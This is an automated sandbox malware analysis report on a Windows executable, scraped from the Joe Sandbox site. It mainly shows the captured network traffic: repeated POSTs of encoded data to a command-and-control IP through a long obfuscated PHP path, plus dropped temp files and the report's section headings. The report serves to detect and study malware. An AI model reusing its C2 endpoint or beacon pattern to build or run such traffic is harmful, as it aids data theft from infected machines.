Aug 28, 2024 11:17:30.191195011 CEST	25	IN	HTTP/1.1 100 Continue
Aug 28, 2024 11:17:30.409595966 CEST	207	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 52 5d 50 Data Ascii: ?R]P
Aug 28, 2024 11:17:30.409657001 CEST	207	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 52 5d 50 Data Ascii: ?R]P

Timestamp	Bytes transferred	Direction	Data
Aug 28, 2024 11:17:30.854228973 CEST	391	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 2512 Expect: 100-continue
Aug 28, 2024 11:17:31.206238031 CEST	2512	OUT	Data Raw: 5e 52 5e 54 5d 51 5c 50 5b 57 5a 59 52 5f 54 55 54 51 5e 5e 57 50 5a 5d 5c 5b 5a 50 5a 59 5b 54 5c 5d 54 47 5a 53 57 55 5f 58 54 56 58 51 57 5b 50 5d 5f 40 58 5d 57 5b 51 53 53 50 54 5c 5f 5a 5f 5f 5d 50 57 52 57 56 5c 5f 59 5b 43 5d 5c 5c 51 50 Data Ascii: ^R^T]Q\P[WZYR_TUTQ^^WPZ]\[ZPZY[T\]TGZSWU_XTVXQW[P]_@X]W[QSSPT\_Z__]PWRWV\_Y[C]\\QP[^T[QXWZVP]Z^UZ]XTPX_[][YR\S\U[XWPZZ]R_\ZQSZGPX_[W]YZ^Y^XQP\TPX_TE^QWH]^\XTY[Y_\\V^_ZRZZU[S^VY^^[Y^ZVS".2&?8# (X&9"#.+W48&<?*!6,:(9"Y %X!/
Aug 28, 2024 11:17:31.535260916 CEST	25	IN	HTTP/1.1 100 Continue
Aug 28, 2024 11:17:31.661470890 CEST	151	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3f 52 5d 50 Data Ascii: ?R]P

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ugRGgCJhQl.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\0I9clPAEvG

C:\Users\user\AppData\Local\Temp\0QApUIvQAk

C:\Users\user\AppData\Local\Temp\0Siq05bJaM

C:\Users\user\AppData\Local\Temp\0XsU0yJI0t

C:\Users\user\AppData\Local\Temp\0XvR9U6pTM

C:\Users\user\AppData\Local\Temp\0wYveN1X6s

C:\Users\user\AppData\Local\Temp\11bRkczOOL

C:\Users\user\AppData\Local\Temp\19tL47ANQA

C:\Users\user\AppData\Local\Temp\1CVvbWQ0xh

C:\Users\user\AppData\Local\Temp\1Ljt1Wk9pz

C:\Users\user\AppData\Local\Temp\1UFfVf7MIh

Windows Analysis Report
ugRGgCJhQl.exe

Timestamp	Bytes transferred	Direction	Data
Aug 28, 2024 11:17:34.618594885 CEST	415	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 1840 Expect: 100-continue Connection: Keep-Alive
Aug 28, 2024 11:17:34.971952915 CEST	1840	OUT	Data Raw: 5b 57 5b 5f 5d 5e 59 5b 5b 57 5a 59 52 58 54 51 54 5b 5e 5d 57 53 5a 5b 5c 5b 5a 50 5a 59 5b 54 5c 5d 54 47 5a 53 57 55 5f 58 54 56 58 51 57 5b 50 5d 5f 40 58 5d 57 5b 51 53 53 50 54 5c 5f 5a 5f 5f 5d 50 57 52 57 56 5c 5f 59 5b 43 5d 5c 5c 51 50 Data Ascii: [W[_]^Y[[WZYRXTQT[^]WSZ[\[ZPZY[T\]TGZSWU_XTVXQW[P]_@X]W[QSSPT\_Z__]PWRWV\_Y[C]\\QP[^T[QXWZVP]Z^UZ]XTPX_[][YR\S\U[XWPZZ]R_\ZQSZGPX_[W]YZ^Y^XQP\TPX_TE^QWH]^\XTY[Y_\\V^_ZRZZU[S^VY^^[Y^ZVS!B,16_>8 !.Y&<Y!'9+W#;0X$?9"Z6,%("Y %X!3
Aug 28, 2024 11:17:35.245728016 CEST	25	IN	HTTP/1.1 100 Continue
Aug 28, 2024 11:17:35.377392054 CEST	380	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:35 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 0d 1a 24 5d 34 2d 28 0f 25 0a 38 5a 38 5e 2a 56 2a 3c 09 07 3d 31 38 5f 30 3e 3b 0d 24 2b 27 0f 25 38 37 08 24 21 35 16 30 04 30 0e 26 26 2d 5f 06 11 25 0a 20 06 00 01 3b 31 20 1c 2a 13 24 5b 36 2d 23 5c 29 0a 29 57 22 2d 27 5e 3d 3c 3a 1c 38 22 39 52 2a 5c 2e 19 2c 3d 34 52 26 10 21 52 0c 17 22 56 3f 00 33 05 20 2b 25 0c 33 0b 27 1c 23 2c 29 12 33 3f 37 50 24 03 20 54 3c 3b 28 1e 24 2e 38 1e 32 15 35 5a 27 5a 38 09 3a 03 2e 53 22 00 2d 48 0e 3d 54 4d Data Ascii: $]4-(%8Z8^V<=18_0>;$+'%87$!500&&-_% ;1 $[6-#\))W"-'^=<:8"9R\.,=4R&!R"V?3 +%3'#,)3?7P$ T<;($.825Z'Z8:.S"-H=TM

Timestamp	Bytes transferred	Direction	Data
Aug 28, 2024 11:17:39.035382986 CEST	415	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 28, 2024 11:17:39.393800974 CEST	2512	OUT	Data Raw: 5b 56 5e 55 58 5c 59 55 5b 57 5a 59 52 59 54 57 54 5e 5e 5f 57 53 5a 5e 5c 5b 5a 50 5a 59 5b 54 5c 5d 54 47 5a 53 57 55 5f 58 54 56 58 51 57 5b 50 5d 5f 40 58 5d 57 5b 51 53 53 50 54 5c 5f 5a 5f 5f 5d 50 57 52 57 56 5c 5f 59 5b 43 5d 5c 5c 51 50 Data Ascii: [V^UX\YU[WZYRYTWT^^_WSZ^\[ZPZY[T\]TGZSWU_XTVXQW[P]_@X]W[QSSPT\_Z__]PWRWV\_Y[C]\\QP[^T[QXWZVP]Z^UZ]XTPX_[][YR\S\U[XWPZZ]R_\ZQSZGPX_[W]YZ^Y^XQP\TPX_TE^QWH]^\XTY[Y_\\V^_ZRZZU[S^VY^^[Y^ZVS",!*_??#>1 Z5;<V.2R4?&?"X<9%"/%+"Y %X!7
Aug 28, 2024 11:17:39.604217052 CEST	25	IN	HTTP/1.1 100 Continue
Aug 28, 2024 11:17:39.732898951 CEST	207	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 52 5d 50 Data Ascii: ?R]P

Timestamp	Bytes transferred	Direction	Data
Aug 28, 2024 11:17:39.895443916 CEST	415	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 28, 2024 11:17:40.253138065 CEST	2512	OUT	Data Raw: 5e 57 5b 5f 58 5b 59 50 5b 57 5a 59 52 59 54 53 54 5a 5e 58 57 57 5a 59 5c 5b 5a 50 5a 59 5b 54 5c 5d 54 47 5a 53 57 55 5f 58 54 56 58 51 57 5b 50 5d 5f 40 58 5d 57 5b 51 53 53 50 54 5c 5f 5a 5f 5f 5d 50 57 52 57 56 5c 5f 59 5b 43 5d 5c 5c 51 50 Data Ascii: ^W[_X[YP[WZYRYTSTZ^XWWZY\[ZPZY[T\]TGZSWU_XTVXQW[P]_@X]W[QSSPT\_Z__]PWRWV\_Y[C]\\QP[^T[QXWZVP]Z^UZ]XTPX_[][YR\S\U[XWPZZ]R_\ZQSZGPX_[W]YZ^Y^XQP\TPX_TE^QWH]^\XTY[Y_\\V^_ZRZZU[S^VY^^[Y^ZVS!C,%<;'4.10[ ;+-8"R#83<^<%!2?9"Y %X!7

Timestamp	Bytes transferred	Direction	Data
Aug 28, 2024 11:17:40.400171041 CEST	415	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 1840 Expect: 100-continue Connection: Keep-Alive
Aug 28, 2024 11:17:40.753385067 CEST	1840	OUT	Data Raw: 5e 57 5b 58 5d 5c 5c 56 5b 57 5a 59 52 5f 54 55 54 5c 5e 5c 57 53 5a 5d 5c 5b 5a 50 5a 59 5b 54 5c 5d 54 47 5a 53 57 55 5f 58 54 56 58 51 57 5b 50 5d 5f 40 58 5d 57 5b 51 53 53 50 54 5c 5f 5a 5f 5f 5d 50 57 52 57 56 5c 5f 59 5b 43 5d 5c 5c 51 50 Data Ascii: ^W[X]\\V[WZYR_TUT\^\WSZ]\[ZPZY[T\]TGZSWU_XTVXQW[P]_@X]W[QSSPT\_Z__]PWRWV\_Y[C]\\QP[^T[QXWZVP]Z^UZ]XTPX_[][YR\S\U[XWPZZ]R_\ZQSZGPX_[W]YZ^Y^XQP\TPX_TE^QWH]^\XTY[Y_\\V^_ZRZZU[S^VY^^[Y^ZVS!A8<+$#.7%)$[5+8U.%#8'?.?"5("Y %X!/
Aug 28, 2024 11:17:41.045871019 CEST	25	IN	HTTP/1.1 100 Continue
Aug 28, 2024 11:17:41.178191900 CEST	380	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:40 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 0d 1a 27 00 37 3e 3f 50 26 1d 27 01 2c 3b 31 0f 29 2c 0e 1d 3d 0b 30 5d 33 07 24 56 27 38 2b 08 27 2b 37 45 33 22 0f 15 30 5b 2f 54 31 36 2d 5f 06 11 26 19 34 28 03 59 2f 32 0d 0d 2a 03 2b 05 22 2e 2f 5b 3d 30 3e 0b 22 10 20 05 2a 02 3d 0f 2c 22 21 10 3d 04 00 5e 38 03 3c 1b 32 3a 21 52 0c 17 21 0e 2b 5f 3f 00 20 16 21 0b 27 22 01 55 23 11 25 1d 27 06 23 56 33 39 33 0f 28 2b 2b 0a 32 10 23 0a 26 2b 26 05 30 02 3b 1a 39 39 2e 53 22 00 2d 48 0e 3d 54 4d Data Ascii: '7>?P&',;1),=0]3$V'8+'+7E3"0[/T16-_&4(Y/2+"./[=0>" =,"!=^8<2:!R!+_? !'"U#%'#V393(++2#&+&0;99.S"-H=TM

Timestamp	Bytes transferred	Direction	Data
Aug 28, 2024 11:17:40.599124908 CEST	415	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 28, 2024 11:17:40.956342936 CEST	2512	OUT	Data Raw: 5e 55 5b 5b 5d 5f 59 57 5b 57 5a 59 52 5b 54 57 54 5c 5e 5f 57 56 5a 5a 5c 5b 5a 50 5a 59 5b 54 5c 5d 54 47 5a 53 57 55 5f 58 54 56 58 51 57 5b 50 5d 5f 40 58 5d 57 5b 51 53 53 50 54 5c 5f 5a 5f 5f 5d 50 57 52 57 56 5c 5f 59 5b 43 5d 5c 5c 51 50 Data Ascii: ^U[[]_YW[WZYR[TWT\^_WVZZ\[ZPZY[T\]TGZSWU_XTVXQW[P]_@X]W[QSSPT\_Z__]PWRWV\_Y[C]\\QP[^T[QXWZVP]Z^UZ]XTPX_[][YR\S\U[XWPZZ]R_\ZQSZGPX_[W]YZ^Y^XQP\TPX_TE^QWH]^\XTY[Y_\\V^_ZRZZU[S^VY^^[Y^ZVS!.!9++(Y#X(]&9+6<U.8%#(Y3,<:!5?:("Y %X!
Aug 28, 2024 11:17:41.222904921 CEST	25	IN	HTTP/1.1 100 Continue
Aug 28, 2024 11:17:41.355968952 CEST	207	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 52 5d 50 Data Ascii: ?R]P

Timestamp	Bytes transferred	Direction	Data
Aug 28, 2024 11:17:41.518137932 CEST	391	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 2512 Expect: 100-continue
Aug 28, 2024 11:17:41.862628937 CEST	2512	OUT	Data Raw: 5e 57 5e 54 5d 5f 59 50 5b 57 5a 59 52 5e 54 50 54 5a 5e 5a 57 5f 5a 5b 5c 5b 5a 50 5a 59 5b 54 5c 5d 54 47 5a 53 57 55 5f 58 54 56 58 51 57 5b 50 5d 5f 40 58 5d 57 5b 51 53 53 50 54 5c 5f 5a 5f 5f 5d 50 57 52 57 56 5c 5f 59 5b 43 5d 5c 5c 51 50 Data Ascii: ^W^T]_YP[WZYR^TPTZ^ZW_Z[\[ZPZY[T\]TGZSWU_XTVXQW[P]_@X]W[QSSPT\_Z__]PWRWV\_Y[C]\\QP[^T[QXWZVP]Z^UZ]XTPX_[][YR\S\U[XWPZZ]R_\ZQSZGPX_[W]YZ^Y^XQP\TPX_TE^QWH]^\XTY[Y_\\V^_ZRZZU[S^VY^^[Y^ZVS!86^(4.?1,X6$T:;!;?0Z*9!6<!+"Y %X!+
Aug 28, 2024 11:17:42.172271967 CEST	25	IN	HTTP/1.1 100 Continue
Aug 28, 2024 11:17:42.300539017 CEST	151	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3f 52 5d 50 Data Ascii: ?R]P

Timestamp	Bytes transferred	Direction	Data
Aug 28, 2024 11:17:42.585572958 CEST	415	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 28, 2024 11:17:42.940685987 CEST	2512	OUT	Data Raw: 5b 56 5b 59 58 58 5c 51 5b 57 5a 59 52 55 54 55 54 58 5e 5c 57 5e 5a 5b 5c 5b 5a 50 5a 59 5b 54 5c 5d 54 47 5a 53 57 55 5f 58 54 56 58 51 57 5b 50 5d 5f 40 58 5d 57 5b 51 53 53 50 54 5c 5f 5a 5f 5f 5d 50 57 52 57 56 5c 5f 59 5b 43 5d 5c 5c 51 50 Data Ascii: [V[YXX\Q[WZYRUTUTX^\W^Z[\[ZPZY[T\]TGZSWU_XTVXQW[P]_@X]W[QSSPT\_Z__]PWRWV\_Y[C]\\QP[^T[QXWZVP]Z^UZ]XTPX_[][YR\S\U[XWPZZ]R_\ZQSZGPX_[W]YZ^Y^XQP\TPX_TE^QWH]^\XTY[Y_\\V^_ZRZZU[S^VY^^[Y^ZVS";29?Y ><]2)4[68 -82V7^/'<+*&["<9\+)"Y %X!
Aug 28, 2024 11:17:43.236598969 CEST	25	IN	HTTP/1.1 100 Continue
Aug 28, 2024 11:17:43.372584105 CEST	207	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 52 5d 50 Data Ascii: ?R]P

Timestamp	Bytes transferred	Direction	Data
Aug 28, 2024 11:17:43.558115005 CEST	415	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 28, 2024 11:17:43.912879944 CEST	2512	OUT	Data Raw: 5b 5a 5b 5e 58 5f 5c 56 5b 57 5a 59 52 59 54 53 54 5b 5e 58 57 56 5a 59 5c 5b 5a 50 5a 59 5b 54 5c 5d 54 47 5a 53 57 55 5f 58 54 56 58 51 57 5b 50 5d 5f 40 58 5d 57 5b 51 53 53 50 54 5c 5f 5a 5f 5f 5d 50 57 52 57 56 5c 5f 59 5b 43 5d 5c 5c 51 50 Data Ascii: [Z[^X_\V[WZYRYTST[^XWVZY\[ZPZY[T\]TGZSWU_XTVXQW[P]_@X]W[QSSPT\_Z__]PWRWV\_Y[C]\\QP[^T[QXWZVP]Z^UZ]XTPX_[][YR\S\U[XWPZZ]R_\ZQSZGPX_[W]YZ^Y^XQP\TPX_TE^QWH]^\XTY[Y_\\V^_ZRZZU[S^VY^^[Y^ZVS!B;1?#1$X"7:"4,'?2+)!?=Z+"Y %X!7
Aug 28, 2024 11:17:44.246110916 CEST	25	IN	HTTP/1.1 100 Continue
Aug 28, 2024 11:17:44.378194094 CEST	207	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 52 5d 50 Data Ascii: ?R]P

Timestamp	Bytes transferred	Direction	Data
Aug 28, 2024 11:17:44.550317049 CEST	415	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 28, 2024 11:17:44.909434080 CEST	2512	OUT	Data Raw: 5b 53 5e 55 5d 58 59 54 5b 57 5a 59 52 5a 54 56 54 50 5e 5a 57 57 5a 5c 5c 5b 5a 50 5a 59 5b 54 5c 5d 54 47 5a 53 57 55 5f 58 54 56 58 51 57 5b 50 5d 5f 40 58 5d 57 5b 51 53 53 50 54 5c 5f 5a 5f 5f 5d 50 57 52 57 56 5c 5f 59 5b 43 5d 5c 5c 51 50 Data Ascii: [S^U]XYT[WZYRZTVTP^ZWWZ\\[ZPZY[T\]TGZSWU_XTVXQW[P]_@X]W[QSSPT\_Z__]PWRWV\_Y[C]\\QP[^T[QXWZVP]Z^UZ]XTPX_[][YR\S\U[XWPZZ]R_\ZQSZGPX_[W]YZ^Y^XQP\TPX_TE^QWH]^\XTY[Y_\\V^_ZRZZU[S^VY^^[Y^ZVS!B/!:^<^<X#=#2'5U-1#8+32[+_&Y")\+"Y %X!;
Aug 28, 2024 11:17:45.191829920 CEST	25	IN	HTTP/1.1 100 Continue
Aug 28, 2024 11:17:45.321521044 CEST	207	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 52 5d 50 Data Ascii: ?R]P

Timestamp	Bytes transferred	Direction	Data
Aug 28, 2024 11:17:45.479552984 CEST	415	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 28, 2024 11:17:45.831350088 CEST	2512	OUT	Data Raw: 5b 55 5b 5c 5d 5b 59 57 5b 57 5a 59 52 59 54 57 54 5e 5e 5f 57 53 5a 59 5c 5b 5a 50 5a 59 5b 54 5c 5d 54 47 5a 53 57 55 5f 58 54 56 58 51 57 5b 50 5d 5f 40 58 5d 57 5b 51 53 53 50 54 5c 5f 5a 5f 5f 5d 50 57 52 57 56 5c 5f 59 5b 43 5d 5c 5c 51 50 Data Ascii: [U[\][YW[WZYRYTWT^^_WSZY\[ZPZY[T\]TGZSWU_XTVXQW[P]_@X]W[QSSPT\_Z__]PWRWV\_Y[C]\\QP[^T[QXWZVP]Z^UZ]XTPX_[][YR\S\U[XWPZZ]R_\ZQSZGPX_[W]YZ^Y^XQP\TPX_TE^QWH]^\XTY[Y_\\V^_ZRZZU[S^VY^^[Y^ZVS!A.1]>(<\#Y%+5(S:>78$<)*>",=("Y %X!7
Aug 28, 2024 11:17:46.119349957 CEST	25	IN	HTTP/1.1 100 Continue